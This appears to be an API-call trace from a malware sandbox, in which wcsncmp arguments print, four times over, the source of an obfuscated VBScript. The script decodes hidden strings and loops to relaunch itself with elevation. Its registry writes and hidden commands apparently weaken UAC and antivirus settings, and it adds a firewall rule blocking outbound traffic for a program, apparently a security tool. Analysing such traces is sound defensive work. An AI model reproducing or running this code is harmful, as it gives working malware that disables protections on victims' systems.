bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0222.939] wcsncmp (_String1="4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 39 [0222.939] wcsncmp (_String1=" = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.939] wcsncmp (_String1="= asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0222.939] wcsncmp (_String1=" asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.940] wcsncmp (_String1="asc(Mid(s1,1,1)) - 